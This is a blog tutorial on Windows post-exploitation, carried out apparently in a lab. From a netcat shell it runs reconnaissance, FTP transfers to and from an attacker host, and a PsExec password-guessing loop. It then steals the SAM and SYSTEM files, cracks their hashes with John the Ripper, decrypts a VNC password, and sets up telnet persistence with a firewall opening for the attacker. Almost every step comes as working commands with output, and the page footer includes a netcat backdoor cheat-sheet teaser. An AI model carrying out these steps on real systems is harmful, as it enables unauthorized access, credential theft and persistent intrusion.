Windows Post Exploitation : Part 1

Windows Post Exploitation 


In this post I'm going to walk through a Post Exploitation scenario, starting with a netcat shell, with limited user privileges. The goal is to move up the network without using penetration testing products like Metasploit, Core Impact, CANVAS or others, using the least amount of tools by trying to leverage the target systems OS resources.



Reconnaissance
If you want to win, you must know your environment.
 
Start by gathering System related information

C:\>systeminfo
systeminfo

Host Name:                 XP-INTRANET
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          User
Registered Organization:  
Product ID:                76487-OEM-0060233-70102
Original Install Date:     3/1/2011, 6:18:31 PM
System Up Time:            1 Days, 22 Hours, 31 Minutes, 28 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 15 Model 2 Stepping 8 GenuineIntel ~2800 Mhz
BIOS Version:              PTLTD  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon,
                           London
Total Physical Memory:     127 MB
Available Physical Memory: 28 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\XP-INTRANET
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: Q147222
                           [02]: KB936929 - Service Pack
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.0.1.137
                                 IP address(es)
                                 [01]: 10.0.1.138
 
From the systeminfo command we can extract detailed configuration information
about a computer and its operating system, including operating system 
configuration, security information, product ID, and hardware properties, 
such as RAM, disk space, and network cards.

Next we’ll check the available services

Running Services 
C:\>tasklist /svc
tasklist /svc
Image Name                   PID Services                                    
========================= ====== ===========
System Idle Process            0 N/A                                        
System                              4 N/A                                        
smss.exe                        536 N/A                                        
csrss.exe                        592 N/A                                        
winlogon.exe                  616 N/A                                        
services.exe                   660 Eventlog, PlugPlay                          
lsass.exe                        672 PolicyAgent, ProtectedStorage, SamSs        
vmacthlp.exe                 836 VMware Physical Disk Helper Service        
logonui.exe                    848 N/A                                        
svchost.exe                    880 DcomLaunch, TermService                    
svchost.exe                    968 RpcSs                                      
svchost.exe                  1060 AudioSrv, Browser, CryptSvc, Dhcp, dmserver,
                                 ERSvc, EventSystem,                     
                                 FastUserSwitchingCompatibility, helpsvc,    
                                 lanmanserver, lanmanworkstation, Netman,    
                                 Nla, Schedule, seclogon, SENS, SharedAccess,
                                 ShellHWDetection, srservice, Themes, TrkWks,
                                 W32Time, winmgmt, wscsvc, wuauserv, WZCSVC   
svchost.exe                 1192 Dnscache                                    
svchost.exe                 1212 LmHosts, RemoteRegistry, SSDPSRV, WebClient
spoolsv.exe                 1416 Spooler                                    
vmtoolsd.exe              1660 VMTools                                    
VMUpgradeHelper.exe  1880 VMUpgradeHelper                            
alg.exe                       1808 ALG                                        
imapi.exe                   1604 ImapiService                                
csrss.exe                    2692 N/A                                        
winlogon.exe               2720 N/A                                        
rdpclip.exe                  2916 N/A                                        
wscntfy.exe                 2920 N/A                                        
explorer.exe                3032 N/A                                        
VMwareTray.exe            352 N/A                                        
logon.scr                    2164 N/A                                        
cmd.exe                     2268 N/A                                        
nc.exe                        1136 N/A                                        
cmd.exe                     4008 N/A                                        
tasklist.exe                 2604 N/A                                        
wmiprvse.exe             3496 N/A


Installed Services




C:\>sc query state= all
sc query state= all 




SERVICE_NAME         : Alerter
DISPLAY_NAME         : Alerter
        TYPE                : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE      : 1077 (0x435)
        SERVICE_EXIT_COD E  : 0 (0x0)
        CHECKPOINT               : 0x0
        WAIT_HINT                 : 0x0

SERVICE_NAME         : ALG
DISPLAY_NAME         : Application Layer Gateway Service
        TYPE                : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE     : 0 (0x0)
        SERVICE_EXIT_CODE  : 0 (0x0)
        CHECKPOINT              : 0x0
        WAIT_HINT                : 0x0
...
SERVICE_NAME: WinVNC4
DISPLAY_NAME: VNC Server Version 4
        TYPE                : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE     : 0 (0x0)
        SERVICE_EXIT_CODE  : 0 (0x0)
        CHECKPOINT              : 0x0
        WAIT_HINT                : 0x0
...
SERVICE_NAME: xmlprov
DISPLAY_NAME: Network Provisioning Service
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE             : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE     : 1077 (0x435)
        SERVICE_EXIT_CODE  : 0 (0x0)
        CHECKPOINT              : 0x0
        WAIT_HINT                : 0x0


From the information obtain we have a clear picture of the exploited 
machine, and some system recourses the we can leverage, like the VNC 
Server seen above.

User Related Information 




Current environment settings 


C:\>set
set
ALLUSERSPROFILE=C:\Documents and Settings\All Users
APPDATA=C:\Documents and Settings\John\Application Data
CLIENTNAME=iMac
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=XP-INTRANET
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\John
LOGONSERVER=\\XP-INTRANET
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 15 Model 2 Stepping 8, GenuineIntel
PROCESSOR_LEVEL=15
PROCESSOR_REVISION=0208
ProgramFiles=C:\Program Files
PROMPT=$P$G
SESSIONNAME=RDP-Tcp#4
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\John\LOCALS~1\Temp
TMP=C:\DOCUME~1\John\LOCALS~1\Temp
USERDOMAIN=XP-INTRANET
USERNAME=John
USERPROFILE=C:\Documents and Settings\John
windir=C:\WINDOWS


 


Filtering the results
Find Username 


C:\>set | find "USERNAME"
set | find "USERNAME"
USERNAME=John




Find Domain 






C:\>set | find "USERDOMAIN"
set | find "USERDOMAIN"
USERDOMAIN=XP-INTRANET




Find Current User Information


C:\>net user John
net user John
User name                        John
Full Name                         John
Comment                    
User's comment              
Country code                     000 (System Default)
Account active                   Yes
Account expires                 Never
Password last set                9/11/2011 1:38 PM
Password expires                Never
Password changeable          9/11/2011 1:38 PM
Password required                  Yes
User may change password     Yes
Workstations allowed         All
Logon script                
User profile                
Home directory              
Last logon                   9/13/2011 8:15 PM
Logon hours allowed          All
Local Group Memberships      *Remote Desktop Users *Users              
Global Group memberships     *None 






The command completed successfully.  




Current User Privileges


Local Group Memberships      *Remote Desktop Users *Users              
Global Group memberships     *None   




Find Users with Administrator Privileges in the current machine




C:\>net localgroup Administrators
net localgroup   Administrators
Alias name       Administrators
Comment         Administrators have complete and unrestricted access 


                       to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Jack
The command completed successfully. 




Note



Users accounts other than the Administrator tend to have weaker passwords, 



so take note of the Jack account. 









Privilege Escalation






Upload some useful tools using FTP













First make a file containing FTP commands








C:\>cd C:\Docume~1\John
cd C:\Docume~1\John
C:\DOCUME~1\John>echo Bob>ftp.src
echo Bob>ftp.src
C:\DOCUME~1\John>echo bobisyouruncle>>ftp.src
echo bobisyouruncle>>ftp.src
C:\DOCUME~1\John>echo bin>>ftp.src
echo bin>>ftp.src
C:\DOCUME~1\John>echo get PsExec.exe>>ftp.src
echo get PsExec.exe>>ftp.src
C:\DOCUME~1\John>echo get nc.exe>>ftp.src
echo get nc.exe>>ftp.src
C:\DOCUME~1\John>echo get FPipe.exe>>ftp.src
echo get FPipe.exe>>ftp.src
C:\DOCUME~1\John>echo get PassList.txt>>ftp.src
echo get PassList.txt>>ftp.src
C:\DOCUME~1\John>echo bye>>ftp.src
echo bye>>ftp.src 




C:\DOCUME~1\John>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CC58-320F
 Directory of C:\DOCUME~1\John

09/16/2011  11:44 AM    <DIR>          .
09/16/2011  11:44 AM    <DIR>          ..
09/15/2011  01:44 AM    <DIR>          Desktop
09/11/2011  05:35 PM    <DIR>          Favorites
09/16/2011  11:42 AM                69 ftp.src
09/14/2011  11:51 AM    <DIR>          My Documents
03/01/2011  07:10 PM    <DIR>          Start Menu
               1 File(s)             73 bytes
               6 Dir(s)   2,913,312,768 bytes free




Run the FTP client




C:\DOCUME~1\John>ftp -s:ftp.src 10.0.1.174
ftp -s:ftp.src 10.0.1.174
User (10.0.1.174:(none)):

bin
get PsExec.exe
get nc.exe
get FPipe.exe
get PassList.txt
bye
C:\DOCUME~1\John>del ftp.src
del ftp.src  


Password Guessing with PsExec  




Username: Jack
Computer Name: XP-INTRANET
Password List: PassLis.txt





C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula 


\\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** 


%i *****************FOR /f %i in (PassList.txt) do @echo %i & 


@psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && 


echo ***************** %i *****************
123456
12345
123456789
password
Password
iloveyou
P4ssw0rd1
princess
rockyou
Password123
1234567
12345678
abc123
P4ssw0rd
Nicole
Simplepass
Daniel
MyPass1
babygirl
monkey
Jessica
Lovely
michael
Ashley
Secret1
***************** Secret1 *****************
654321
Qwerty 


 


Password for Jack: Secret1 













Grabbing the Sam and System files 








Sam File
 








C:\DOCUME~1\John>psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe 


/c "copy C:\windows\repair\sam C:\Docume~1\John\"psexec \\XP-INTRANET 


-u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\sam C:\Docume~1\John\"

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

cmd.exe exited with error code 0.


 


System File 




C:\DOCUME~1\John>psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe 


/c "copy C:\windows\repair\system C:\Docume~1\John\"psexec \\XP-INTRANET 


-u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\system C:\Docume~1\John\"

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

cmd.exe exited with error code 0. 




Make file containing FTP commands




C:\DOCUME~1\John>echo Bob>ftp.src
echo Bob>ftp.src
C:\DOCUME~1\John>echo toor>>ftp.src
echo toor>>ftp.src
C:\DOCUME~1\John>echo bin>>ftp.src
echo bin>>ftp.src
C:\DOCUME~1\John>echo put sam>>ftp.src
echo put sam>>ftp.src
C:\DOCUME~1\John>echo put system>>ftp.src
echo put system>>ftp.src
C:\DOCUME~1\John>echo bye>>ftp.src
echo bye>>ftp.src  





Uploading the files to the attacker machine




C:\DOCUME~1\John>ftp -s:ftp.src 10.0.1.174
ftp -s:ftp.src 10.0.1.174
User (10.0.1.174:(none)):

bin
put sam
put system
bye  


 


Password Cracking




Extract Hashes from the sam and system file with samdump2  


 


root@bt:~# samdump2 sam system >hashes.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
root@bt:~# cat hashes.txt
Administrator:500:2087ec72c3dcba83d5367c170aa9b994:b8813ba5b424db4b6dcac460d84c127b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a24902c1f8098ab6b4a2760e3a0920ab:5d6d47bbb13ca7fddc038b99a07c333d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b5968af5ca7feec3bc364f8bf7978c8b:::


Password cracking with John the Ripper using a wordlist 




root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt 


--rules /root/hashes.txt
Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
Secret1          (Jack)
Simplepass       (John)
P4ssw0rd         (Administrator)
guesses: 3  time: 0:00:00:00 100.00% (ETA: Fri Sep 16 21:53:18 2011)  c/s: 5591K 


 trying: Skidoing - Zhongguing 


Passwords found:
Jack - Secret1
John - Simplepass
Administrator - P4ssw0rd






Persistence




Start stopped Services to maintain access
Back to the VNC Server Version 4 found previously.




Check the service state


C:\DOCUME~1\John>sc query WinVNC4
sc query WinVNC4
SERVICE_NAME: WinVNC4
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,


                                IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0 (0x0)
        SERVICE_EXIT_CODE  : 0 (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0   


Grab VNC Password 




C:\DOCUME~1\John>psexec -u Jack -p Secret1 reg export HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 C:\docume~1\John\vnc.reg
psexec -u Jack -p Secret1 reg export HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 C:\docume~1\John\vnc.reg

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

reg exited with error code 0.  


 


View encrypted VNC Password
C:\DOCUME~1\John>type vnc.reg
type vnc.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4]
"Password"=hex:79,9a,a1,cb,85,e9,79,db
"SecurityTypes"="VncAuth"
"ReverseSecurityTypes"="None"
"QueryConnect"=dword:00000000
"QueryOnlyIfLoggedOn"=dword:00000000 




VNC hash 799aa1cb85e979db


 


Decrypt the VNC hash in the attacker machine with vncdec.exe 


C:\>vncdec.exe 799aa1cb85e979db
----------------------------------
RealVNC Password Decrypter
by Jonas Piela, www.jonaspiela.de
----------------------------------
running in hash mode...
----------------------------------
decrypted password: VNCPass
---------------------------------- 


Testing the connection with vncviewer


root@bt:~# vncviewer 10.0.1.138
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "XP-INTRANET"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage 


 



 










Enable telnet server on the target machine




Note: I advise against using telnet as a persistence method, because 
telnet transmits data in plain readable text. Use SSH instead, in these 
example the goal is to introduce the least amount of tools on the 
targets machines, so I'll use telnet.


Set service to automatically start upon boot








C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc config tlntsvr start= auto
psexec -u Jack -p Secret1 sc config tlntsvr start= auto

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

sc exited with error code 0


 


Start the Telnet server


C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc start tlntsvr
psexec -u Jack -p Secret1 sc start tlntsvr

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

sc exited with error code 0..  



Add rule to firewall 




C:\DOCUME~1\John>psexec -u Jack -p Secret1 netsh firewall add portopening protocol = TCP port = 23 name = Telnet mode = enable scope = custom address = 10.0.1.174
psexec -u Jack -p Secret1 netsh firewall add portopening protocol = TCP port = 23 name = Telnet mode = enable scope = custom address = 10.0.1.174

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

netsh exited with error code 0.  






 


Telnet to target machine


root@bt:~# telnet 10.0.1.138
Trying 10.0.1.138...
Connected to 10.0.1.138.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: Jack
password:

*=====================================
Welcome to Microsoft Telnet Server.
*=====================================
C:\Documents and Settings\Jack>










































Comments











Post a Comment























Popular posts from this blog









Cheat Sheet : Wireshark















   Now that you know some command line packet sniffing, lets go over some wireshark display filters:   * If you want to filter by a protocol, just type it in, like arp, dns, etc.    * If you click the analyze tab you can filter here as well    *  If you did it by tp, you can go to preferences/protocols/tcp and take  the check out of “relative sequence numbers” and they will show the real  seq numbers    * Right click a packet and follow tcp  stream to see the whole conversation between the client and the server .  if you do this and you close out of the window you will see that the  filter is listed for these packets    * A source filter can  be applied to restrict the packet view in wireshark to only those  packets that have source IP as mentioned in the filter. The filter  applied in the example below is: ip.src == 10.10.10.5    * A  destination filter can be applied to restrict the packet view in  wireshark to only those packets that have destination IP as m...








Read more










Monitor and block SSH connection attempts















  Monitor and block SSH connection attempts.   Here is a simple guide for iptables...     This will set iptables to default:   ........     sudo iptables -P INPUT ACCEPT   sudo iptables -P OUTPUT ACCEPT   sudo iptables -P FORWARD ACCEPT     Then flush the rules:     sudo iptables -F INPUT   sudo iptables -F OUTPUT   sudo iptables -F FORWARD     This allows you to view your current rules:     $ sudo iptables -L     ........     Install iptables-persistent package to save tables on reboot.     $ sudo apt-get install iptables-persistent     During the installation, you will asked if you want to save your current firewall rules.     If you update your firewall rules and want to save the changes, run this command:     $ sudo netfilter-persistent save   $ sudo netfilter-persistent reload     ........     With the following, an attacker is allowed to produce  exactly 3 faulty logins in 2 minutes. Afterwards, they will be blocked  for 120 seconds.     1) Add the following line to /etc/ssh/sshd...








Read more










Cheat Sheet : NetCat















   Netcat  is known by most hackers as the swiss army knife of hacking. Its a  great tool to setup backdoors or just plain and simple tcp or udp  connections. Heres a few examples of how you can use netcat:   Lets  do some exercises with it in Kali linux. Our VMs today are a kali linux   and a windows 7. First start by looking at the help file nc -h    1. Lets check to see what ports are listening,(first start the apache2 service) type: nc -v  80    2. If you had started the apache service on kali linux you should see it shows there as open    3. You can also set up a listener port, type: nc -lvp 1234    4. The l here is for listen, the v is for verbose, the p is to specify the port to listen on    5. Lets open up a second terminal window and use netcat to connect to the listener    6. In the second terminal type: nc 10.0.0.100 1234 and hit enter    7. The first terminal should show you connected    8. Now lets chat from the second terminal b...








Read more